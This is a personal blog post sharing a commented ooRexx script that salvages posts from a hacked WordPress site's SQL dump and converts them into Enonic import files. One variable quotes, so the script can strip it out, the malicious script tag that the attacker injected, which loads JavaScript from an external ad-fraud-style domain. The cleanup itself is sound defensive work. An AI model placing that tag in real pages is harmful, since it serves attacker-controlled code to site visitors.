Just a little code example: a small script I wrote to import posts from WordPress to a blog on Enonic

So, I probably should give you the background.

Our WordPress site was hacked repeatedly, and all I had left was a database dump.
The dump is one massive text file.
I grepped it for the INSERT INTO statements for the wp_posts table, which gave me a set of posts.
I was not really interested in restoring everything. I am just trying to get myself a head start.
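
The grep step might look something like the sketch below. The name dump.sql and the three sample rows are made up for illustration (a tiny stand-in dump is created in a temporary directory so the example runs on its own); allarticles.txt is the file name the script further down reads.

```shell
# Hypothetical stand-in for the real dump, which is far larger.
workdir=$(mktemp -d)
cat > "$workdir/dump.sql" <<'EOF'
INSERT INTO `wp_options` VALUES (1,'siteurl','http://example.com');
INSERT INTO `wp_posts` VALUES (1,1,'2020-01-01 10:00:00','First post'),(2,1,'2020-01-02 11:00:00','Second post');
INSERT INTO `wp_users` VALUES (1,'admin');
EOF

# -F treats the pattern as a fixed string, so the backticks are matched literally.
grep -F 'INSERT INTO `wp_posts`' "$workdir/dump.sql" > "$workdir/allarticles.txt"

# Show how many lines were kept (each line is one INSERT holding many posts).
wc -l < "$workdir/allarticles.txt"
```

Each matching line is a single INSERT statement carrying many rows, which is why the result still needs splitting on the `),(` separator afterwards.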

So this script is written in ooRexx. It’s quick, dirty and horribly documented.
I also made a template.xml file based upon an export which I took of a node using the data manager. I then deleted the ID (so that a new one is generated on import) and added a couple of placeholder tags, which my script finds and replaces. These are written between ** **, for example **TITLE**.
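
To show the placeholder idea on its own, here is a minimal shell sketch using sed. The XML structure and the sample values are invented for illustration and are not the real Enonic export format; only the placeholder names **TITLE**, **CREATE_DATE** and **POST** match what the script uses.

```shell
# Hypothetical, much simplified template; a real node export has far more in it.
workdir=$(mktemp -d)
cat > "$workdir/template.xml" <<'EOF'
<node>
  <title>**TITLE**</title>
  <created>**CREATE_DATE**</created>
  <body>**POST**</body>
</node>
EOF

# Made-up sample values standing in for one post.
title='Hello world'
created='2021-02-05'
body='First paragraph.'

# The asterisks are escaped because * is special in a sed pattern.
sed -e "s/\*\*TITLE\*\*/$title/" \
    -e "s/\*\*CREATE_DATE\*\*/$created/" \
    -e "s/\*\*POST\*\*/$body/" \
    "$workdir/template.xml" > "$workdir/node.xml"

cat "$workdir/node.xml"
```

This only works for values without a `/` or `&` in them, since sed treats both specially in a substitution. Real post content is full of them, which is one reason to do the replacement with plain string functions instead.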

I haven’t tested it yet against 7.6 (my machine is on 7.5) but it seems to do the trick, and I was able to upload a large number of articles…

Might be helpful to someone, and looking at my oorexx code should be obligatory… if only because I use more and more obscure techniques to achieve results…

– Somewhat entertaining code for anyone interested in OO dev below – well I like looking at odd programming languages! –

/* 
So here is some really rather ugly ooRexx 
which I used to fix a data import 

usage "rexx procallarticles.rexx [DEBUG]" 

*/

/* this should enable debug mode if you execute it from the command line passing the word DEBUG
    (parse upper arg upper-cases the argument, so debug works as well)
*/ 
parse upper arg InDebugMode .

/* this is the filename for the rather massive file which has everything from wp_posts database table, exported as an SQL Dump.  This is what I have to work with */ 
filename = "./allarticles.txt" 
/* The file is a mess... when my editor complains that the lines are over 10,000 chars long ... one has to question whether they could have done it any neater*/

/* 
So this is the filename of the template file based upon an export of a node for a post taken from my enonic install
I have removed the ID from the top, and have inserted some placeholders which I will replace once processing is done.
*/
templatefilename = "./template.xml" 


/* The output of this script is that it reads the SQL Dump, removes rubbish, and creates nice XML files for all the relevant posts, which are then zipped up and can be uploaded to enonic's data manager via the node Exports
so that they can then be imported into the data store for posts.

I am going to export the xml files generated 
./posts-master-21.../posts/(Specific Post Directory)/_/node.xml ... 
 (element1)(element2)(specificPostDirectory)(element3)(element4)

So this is where I set up the four common parts of the 5 elements in the naming 
*/
exportDirectoryElement.0 = 4
exportDirectoryElement.1 = "posts-master-2021-02-05T07-31-40/"
exportDirectoryElement.2 = "posts/" 
/* exportDirectoryElement.2.5 is the specificPostDirectory so not defined here */ 
exportDirectoryElement.3 = "/_/"
exportDirectoryElement.4 ="node.xml"

/*  So that I can examine the data, I am going to 
    additionally export all the data from the rexx objects 
    
    I should note that I am not putting any serialization behaviour here.  
    The purpose is so that I can look at all the data... and to see if I can improve my import.
*/
filepathRexxExport = "allDataInObjects/"

/* just in case, lets make that directory*/
"mkdir "||filepathRexxExport

/* 
    this is where I would normally put something to 
    rm -rf posts-maste.../posts/ 
    but as I am sharing this file... I don't think I will 
*/ 

/* load the template file into a string 
   We will amend a copy of this string for each object */
template = charin(templatefilename,1, chars(templatefilename)) 

/* Define the separator ... this is what we look for as the terminator between different posts in the sql  */ 
SeperatorKey = '),('                                     /* don't make rude jokes.  We are all far too old */ 

/* this is the insert text we know is in the SQLDump and we probably don't want it */
sqlstring = "INSERT INTO `wp_posts` VALUES"

/*  and this string is here as it was injected into every content post thanks to one of those little bugs in Wordpress 
    .... during one of the multiple hacks on our site.  
    this wasn't even the bad hack ... just a slightly annoying one ... 
    so I have it here so I can remove it from the content. 
*/
hackstring = "<script src=\'https://drake.strongcapitalads.ga/m.js?n=ns1\' type=\'text/javascript\'></script>" 

/* set a variable so my debug code only runs when required */
debug = .false 

if InDebugMode = "DEBUG" then do 
    debug = .true 
end 



/* so we load everything into memory in one shot ... who needs more than 640k anyway ... */
data = charin(filename,1,chars(filename)) 
/*  I could (I suppose) make this more elegant and actually think about ram, closing the stream etc... 
    but in practice, the amount of data, whilst more than practical to copy-paste, is under 100 meg... 
    so it will run in seconds.
*/ 

/* I am going to look through to find the separator keys so this is a shortcut */ 
breaklocation = 1
/* I want to know how many I have done, and once again, lazy programming always wins...*/
articlecount = 0

/* so I do my loop */
do until breaklocation < 1 /* if the key for the next record is at a position of 0 ... we must be at the end */ 

    articlecount = articlecount + 1  /* because I'm sure we will find one */
    datatotallength = length(data) /* by getting the length of the data we can quickly chop it */

    breaklocation = pos(SeperatorKey,data) /* gives us a position, needle in haystack */
    
        /* something I put here for debugging */ 
        
        if debug = .true then do 
            say "article" articlecount "breaklocation" breaklocation "datalength" datatotallength 
        end 
    
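    /* so the important bit is the bit I am going to use */ 
    if breaklocation > 0 then importantbit = left(data,breaklocation)
    else importantbit = data /* no separator left, so whatever remains is the last post */
    /* I want to chop off enough, but never more than there is */
    importantbitlength = min(length(importantbit) + 1, datatotallength)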
    
    /* so I could probably just do this once, but I can't be entirely sure it won't have the SQL multiple times */
    if pos(sqlstring,importantbit) = 1 then do
        importantbit = right(importantbit,length(importantbit)-length(sqlstring))
    end 

    /* this dumps the lot to screen which has been identified as a chunk, and then waits on the enter key */ 
    if debug = .true then do 
        say importantbit 
        pull k
    end
    
    /*  time to get OO, and create an object ... 
        If you thought that rexx was a language for procedural dinosaurs working exclusively on mainframes
        this is where we take the red pill... 
    */ 
    
    p = .WordPressPost~new() /* create a wordpresspost object - You'll find that at the bottom where you see class */ 
    /* p is the object we create of class WordPressPost (the . before it means we are using the class object not an instance of the class.  ~new() returns us the instance)  */ 
            
    p~load(importantbit) /* give it the raw data for the bit which is relevant, and it populates its attributes */ 
    /* method calls are indicated by the ~ not a . as in java */ 
    
    
    /* you know how I said we had a little hacking issue... this removes their injected string */
    p~remove(hackstring,"post_content")
    
    /* and I am also going to remove a whole lot of other rubbish as well */
    p~remove("<!-- wp:paragraph -->","post_content")
    p~remove("<!-- /wp:paragraph -->","post_content")
    p~remove("<!-- wp:heading -->","post_content")
    p~remove("<!-- /wp:heading -->","post_content")
    p~remove("   ","post_content") /* tidy up multiple blank spaces */
    
   
    /* I explain how this works in greater depth in the WordPressPost object 
    
       What I am doing is using reflection, passing the string I want gone, and the name of the attribute where I want it gone.  The remove and replace methods get the attribute value based on the name given
       (or using an attribute number, set up in constants in the class) 
       They will then remove or replace the text (remove is simply a convenience method for replace, using a single space as the replacement) and then set the value of the attribute again. 
    */
    
    /* I am going to put something more elegant here but this fixed some problems with file names on import */ 
    p~replace("?","post_title","")      
    
    /* And this is a strip and trim operation, because nobody likes wasted space */ 
    p~stripAll
    p~makeAllJSONSafe
         
    
    /*
    I display the post content ... so we can check it. 
    */ 
    
    say p~post_content
    
    /* and display some other useful fields as well just check that everything has parsed in and loaded up correctly */
    say "ID" p~id "TITLE" p~post_title "POSTTYPE" p~post_type "POSTSTATUS" p~post_status "POSTDATE" p~post_date
    say "GUID" p~guid
    
    
    /* 
        Right, so time for me to have some fun... let's talk through this... 
        
        I put a copy of the text of the template into the object. 
        I then use the wordpress rexx object string replacements to replace the placeholders 
        with the relevant content. 
    
    */ 
    
    p~template = .string~new(template)        
    
    /* This is the bit where I am replacing things in that template */
    /* Syntax ... needle, haystack, tackWeWillPutInToReplaceNeedle, and note, it is using the attribute name rather than the actual content of the haystack */
    
    p~replace("**POST**","template",p~post_content)                 /* Replace the section where the post should be */ 
    
                                            /* Set the creation date to the post's date first word ie. the date bit */
    p~replace("**CREATE_DATE**","template",word(p~post_date,1))     
    
    p~replace("**TITLE**","template",p~post_title)                  /* And set the title */
    
    /* 
    That's all I am going to do for the moment... but if it works I will end up thinking about how to do more here. 
    */
    
        /* 
            When I say specificPostDirectory, I mean the bit of it which is different from the other posts we are importing.  We are going to base this page name on the post_title, and make it safe.
            
            I was using a very klunky method, I have now moved the majority of the code over to makeJSONSafe 
        */
    
        p~specificPostDirectory = p~post_title
        p~remove("\","specificPostDirectory")
        p~remove("`","specificPostDirectory")
        p~remove("'","specificPostDirectory")
        p~remove(",","specificPostDirectory")
        p~remove("/","specificPostDirectory")
        p~remove("{","specificPostDirectory")
        p~remove("}","specificPostDirectory")
        p~remove("~","specificPostDirectory")
        p~remove(".","specificPostDirectory")
        p~remove("?","specificPostDirectory")
        p~remove('"',"specificPostDirectory")
        p~replace(" ","specificPostDirectory","_")
        p~specificPostDirectory = left(p~specificPostDirectory,30,"_") /* cut or pad to exactly 30 characters */
        
        /* 
            So this is the bit where I generate files. I am only doing that for certain documents on my system.         
            posts which were published. 
        */ 
        if p~post_type = "post" & p~post_status = "publish" then do /* only published posts */
        
        
            /* 
                I want to make sure that I have a directory, to put my export file.  So because things change
                I am using the shell to make the directory.  
                Rather than hard code the directory path down here, it is set at the top of the file in a set of stem variables.  One place to change. 
            */
                        
            "mkdir "||exportDirectoryElement.1
            "mkdir "||exportDirectoryElement.1||exportDirectoryElement.2
            "mkdir "||exportDirectoryElement.1||exportDirectoryElement.2||p~specificPostDirectory 
            "mkdir "||exportDirectoryElement.1||exportDirectoryElement.2||p~specificPostDirectory||exportDirectoryElement.3
            
            /* fn is the file name with path of the xml file we will write out with the amended template text */
            
            fn = exportDirectoryElement.1||exportDirectoryElement.2||p~specificPostDirectory||exportDirectoryElement.3||exportDirectoryElement.4
            
            say fn
            
            /* writes the file */
            rc=charout(fn,p~template)
            /* close the stream ... not needed but ... might help */
            rc=stream(fn, "c","close" )
            say rc 
            if rc \= "READY:"  then do /* a successful close returns READY: */
                pull key 
            end 
        end /* end of the save of the template */ 
    
    /* pull a key if we are in debug */
    if debug = .true then do 
        say p~post_content /* if I am in debug mode I probably want to see the post content... otherwise...  */ 
        pull k 
    end 
    
    /* So now I have clearly finished with the object, I am going to save it to file so I can check it later */
    p~saveToFile(filepathRexxExport)
    
    /* resize the loaded data to remove the section we have already created an object for by doing a right chop */ 
    data = right(data,datatotallength-importantbitlength)
    
end 
/* End of my loop */

/* 
I have to make a zip file to upload, so I might as well do it here... 
*/
"cd "||exportDirectoryElement.1||"; zip postsToExport.zip -r posts/" 

Say "done!" 
exit 


/* 
It's an ooRexx class, representing the WordPressPost Database format. 
*/

::class WordPressPost public

/* 
So an attribute is a quick way of defining a setter and getter for a variable
these attributes are taken from the wordpress schema with some minor name changes
I have done things "nicely" here... these ones are clearly defined in the source code... 
You will see I could have avoided typing all of this 
*/

::attribute id
::attribute author_id
::attribute post_date
::attribute post_date_gmt
::attribute post_content
::attribute post_title
::attribute post_excerpt
::attribute post_status
::attribute comment_status
::attribute ping_status
::attribute post_password
::attribute post_name
::attribute to_ping
::attribute pinged
::attribute post_modified
::attribute post_modified_gmt
::attribute post_content_filtered
::attribute post_parent_id
::attribute guid
::attribute menu_order
::attribute post_type
::attribute post_mime_type
::attribute comment_count

/* 
The attributes here are not "from the database".  It is where I will put a copy of the string with the template text in it which will have the replacements made.
*/
::attribute template 

/* 
The individual directory in the posts folder in which the xml file is exported

part of the reason I have done this is so that I can tidy up the code and turn this into a method at a later date, returning a tidy version instead
*/ 

::attribute specificPostDirectory

/*
I could have used some rather nifty reflection to determine these and issue them numbers ... 
and defined the "unknown" method to avoid actually setting any of the attributes
and just defined them on the fly...
but given this is a quick and dirty job, I have just copied their names into a set of constants and written numbers by hand... 
The purpose of this is so that I can iterate through the numbers, to get the names, to then use reflection to access the named attributes.

The first entry here is an attribute rather than a constant.  
It is a counter of the number of items, and its value is set to 23 in the method init
*/

::attribute atr.0  /* I haven't made this a constant  */
::constant atr.1 "id"
::constant atr.2 "author_id"
::constant atr.3 "post_date"
::constant atr.4 "post_date_gmt"
::constant atr.5 "post_content"
::constant atr.6 "post_title"
::constant atr.7 "post_excerpt"
::constant atr.8 "post_status"
::constant atr.9 "comment_status"
::constant atr.10 "ping_status"
::constant atr.11 "post_password"
::constant atr.12 "post_name"
::constant atr.13 "to_ping"
::constant atr.14 "pinged"
::constant atr.15 "post_modified"
::constant atr.16 "post_modified_gmt"
::constant atr.17 "post_content_filtered"
::constant atr.18 "post_parent_id"
::constant atr.19 "guid"
::constant atr.20 "menu_order"
::constant atr.21 "post_type"
::constant atr.22 "post_mime_type"
::constant atr.23 "comment_count"

/*
This is run when the object is initialised.  
I have intentionally exposed atr.0 here, as this runs while the object is being set up.
I then set the value to 23, which matches the number of constants in the list.  
*/
::method init
expose atr.0 
atr.0 = 23 


/* this is my method for loading up the attributes from the SQL string */ 
::method load
use arg fromSql /* pulls the string in with the sql insert */ 
/* then does this rather inelegant parse value, to break it into the parts ...*/
parse value fromSql with "(" self~id ',' self~author_id ",'" self~post_date "','" self~post_date_gmt "','" self~post_content "','" self~post_title "','" self~post_excerpt "'," self~post_status "," self~comment_status "," self~ping_status "," self~post_password "," self~post_name "," self~to_ping "," self~pinged "," self~post_modified "," self~post_modified_gmt "," self~post_content_filtered "," self~post_parent_id "," self~guid "," self~menu_order "," self~post_type "," self~post_mime_type "," self~comment_count ")"
/* the Rexx Parse command is pretty damn good */
       
  
/*  I am sure I put somewhere else that I was avoiding using reflection in ooRexx
because it's not very well understood, by people who don't do a lot of ooRexx.. 
but ... 
well... I had to... I can't help myself sometimes (ok, I use it a lot) 
reflection it is .... so hopefully this is clear and it saves some time... 
*/ 

::method stripAll
/* so recall that self~atr.0 is set to 23, the number of attributes starting at 1*/ 
do i = 1 to self~atr.0                 /* so we iterate through them */ 
    value = self~getAttributeValue(i)
    value = value~strip("B","'") /* '   <-- that single quote is to get my colour coding to not go crazy... 
                                        now we will remove any single quotes from both sides */
    value = value~strip("B")     /*     and any extra spaces as well from both sides as well */
    self~setAttributeValue(i, value) /* get the name of the attribute which we have been working on 
                                        and set the now amended value back */
end 


/* 
So the next two methods are here to try to minimise the number of data errors which I get 
when I import.  makeAllJSONSafe is a loop which runs makeJSONSafe over every attribute.
*/ 



::method makeAllJSONSafe
do i = 1 to self~atr.0
    self~makeJSONSafe(i)
end 

/* 
One of the advantages of the technique which I have used here, using reflection and having the code being happy
with being passed around a number (as in an integer 1 - 23) which is then used to look up the attribute name but which will work just as well if you actually give it an attribute name directly, is that the source code for doing multiple replacements for each field 
can be written in a very clear and manageable fashion.  Once you know that this code will be run on all those attributes when makeAllJSONSafe is run it becomes very obvious where to make changes. 
*/

::method makeJSONSafe
use arg attributeName
/* I don't know if I've mentioned it yet, but here is as good a place as any.  
ooRexx methods use the term "use arg (variable)".  Just in case you had got this far and were wondering how the object passing was defined. 

Methods run in their own memory space (quite an important consideration when you realise ooRexx is polymorphic, multi inheritance, 
with mixin classes, and runs in an interpreter) - I could go on about class construction design decisions ...

Anyway, more of me using the self object to run methods on attributes by parameter (rather than using the more straightforward technique of simply typing every combination out long hand...) so it's all done using reflection to query and then amend the correct values 
*/

self~remove("\n",attributeName)
self~replace("<",attributeName,"&lt;") 
self~replace(">",attributeName,"&gt;")
self~replace("\`",attributeName,"`") /* If it was slashed we unslash it*/ 
self~replace("`",attributeName,"\`") /* and reslash it either way */
self~replace("\'",attributeName,"'") /* If it was slashed we unslash it*/ 
self~replace("'",attributeName,"\'") /* and reslash it either way */
self~replace('\"',attributeName,'"') /* If it was slashed we unslash it*/ 
self~replace('"',attributeName,'\"') /* and reslash it either way */
self~replace('{',attributeName,'\(')
self~replace('}',attributeName,'\)')
self~remove(x2c('09'),attributeName)
self~remove("&nbsp;",attributeName)


/*  xrange print provides a safe list of letters 
    anything outside of that list is liable to cause issues with the json import
    I should point out that it's not guaranteed that they would cause issues, but 
    when I had repeated json errors on import, I decided to take the "better safe than sorry" approach. 
    and to simply delete any letter which fell outside the range. xrange print is reasonably broad.
    
    verify is a built in function which returns 0 if all the letters are within the specification, or the character position of the 
    first instance of a letter outside the defined list (in this case, provided by xrange("PRINT")) 
    
    To get the single letter from the string, I am using a method of the string class ~subchar(position) which works due to the fact that the value can be presented as a string (and therefore rexx will be happy to dynamically cast it to a string). 
    
    
*/
badletterpos = verify(self~getAttributeValue(attributeName),xrange("PRINT")) 
do while badletterpos <> 0 
    self~badlettersDetected = badletterpos /* yes, this is very sneaky ... unknown! */
    badletter = self~getAttributeValue(attributeName)~subchar(badletterpos) 
    self~remove(badletter,attributeName)
    badletterpos = verify(self~getAttributeValue(attributeName),xrange("PRINT")) 
end


/*  wordpress litters data with comments, so this is to clear them and anything else out and replace with a single space  
This uses the replace method to actually achieve it - so it is a convenience method 
By having it independently of replace, it allows you to be clear in your code as to your intention. 
*/

::method remove
use arg needle, attributeName
self~replace(needle,attributename," ")

/* the code which actually replaces a given data string (the needle) with the replacement 
   The attributeName is where the "haystack" with the data originates (and where the new haystack which has the needle removed, will be placed).  This will work either with numbers or names... 
*/
::method replace
use arg needle, attributeName, replacementtack 
HaystackWithoutNeedle = ChangeStr(needle,self~getAttributeValue(attributename),replacementtack)
self~setAttributeValue(attributeName, HaystackWithoutNeedle)    


/*  If you ask for an attribute using a name ... brilliant. but if you have a number from the constants 
we can look it up for you, determine the name for you and return it.
*/ 

::method getAttributeName
  use arg attributeRequested
if datatype(attributeRequested,"numeric") = .true then do
    name = self~send("atr."||attributeRequested)
end 
else do 
    name = attributeRequested 
    /* I really should check you are actually requesting a valid attribute but I don't */ 
end
return name

/* 
I assume that none of the attributes have numbers as their names
This means that if you do a "getAttributeValue(1) it will return the value of the attribute where the name is the one in the constant with the number 1. 

Equally, if you just ask for an attribute by name, it will return the result.
Why do I think it is better to write

bogon = instanceOfClass~getAttributeValue("Content") 

rather than 

bogon = instanceOfClass~Content()

Well, for starters it allows you to run through them in a loop, pulling the listed attributes ...

Also, it can allow for better factorisation.
    
*/
::method getAttributeValue
   use arg attributeName 
   
if attributeName~dataType("number") = .true then do 
    attributeName = self~getAttributeName(attributeName)
end
   
   return self~send(attributeName) /* and if we send the attribute name to self, it should return the value */ 

   
/* 
I might want to set an attribute value by name or number, so lets make that easy... 
*/ 
   
::method setAttributeValue
use arg attributeName, valueToSet
if attributeName~dataType("number") = .true then do 
    attributeName = self~getAttributeName(attributeName) /* If we've been handed a number, we look up the name */
end 
self~send(attributeName||"=", valueToSet) /* and once we have the name we set the value accordingly */


/* 
Export the current rexx state
by printing out a file
*/ 
::method saveToFile
use arg filepath
fn = filepath||self~specificPostDirectory||"rexxObjectExport.txt"
do i = 1 to self~atr.0
    rc = lineout(fn,self~getAttributeName(i)":")
    rc = lineout(fn," ")
    rc = lineout(fn,self~getAttributeValue(i))
    rc = lineout(fn," ")
end 

/* and I will also output the current state of the template */ 

rc = lineout(fn,"Template :")
rc = lineout(fn," ")
rc = lineout(fn,self~template)
rc = lineout(fn," ")

/* and then close the stream */ 
rc = stream(fn,"c", "close") 


/*
And now for something a little special 
So what I have here is the unknown method.  This is a catch all method. 
What I am doing here is just for a bit of fun.  I have called on a method (in the code) which was not defined in the object
So I am going to let the unknown method set it up for me. and set up the same lookup style as I have for the other 
methods based on the constants at the top of the class. 

Just a bit of fun :) 

*/
::method unknown
use arg name, arguments

methodn = name 

if pos("=",name) > 0 then do /* is it a setter */ 
    methodn = left(methodn,length(methodn)-1) /* I want the name, not the = sign if it's a setter */ 
end 

/* increment the lookup counter */ 
attrnumber = self~atr.0 + 1 
self~atr.0 = attrnumber


self~makeGetterAndSetterMethod("atr."||attrnumber)
self~makeGetterAndSetterMethod(methodn)

/* and I set the name so I can find it */
self~setAttributeValue("atr."||attrnumber,methodn)

/* because of how I have treated it, even though it is actually two separate methods (the source is identical in effect to an attribute), it will now be one of the values iterated through should I iterate through the "attributes", and my methods can get and set it by name or reference.  This will be apparent once we look at the objects export (via saveToFile) where it will sometimes appear and sometimes won't */ 

/* now we have created the method and a setter and getter (the same as an attribute does in the background), we can just pass it back */
/* send along the message with the original args */
forward to(self) message(name) arguments(arguments)


/* 
and my code for creating getter and setter methods on request 
*/ 

::method makeGetterAndSetterMethod
use arg name 
/* set up a setter*/
source = "expose "||name||";use arg "||name||";" 
self~setMethod(name||"=",source,"object")
/* set up a getter*/
source = "expose "||name||";return "||name||";" 
self~setMethod(name,source,"object")

Thanks for sharing Tom.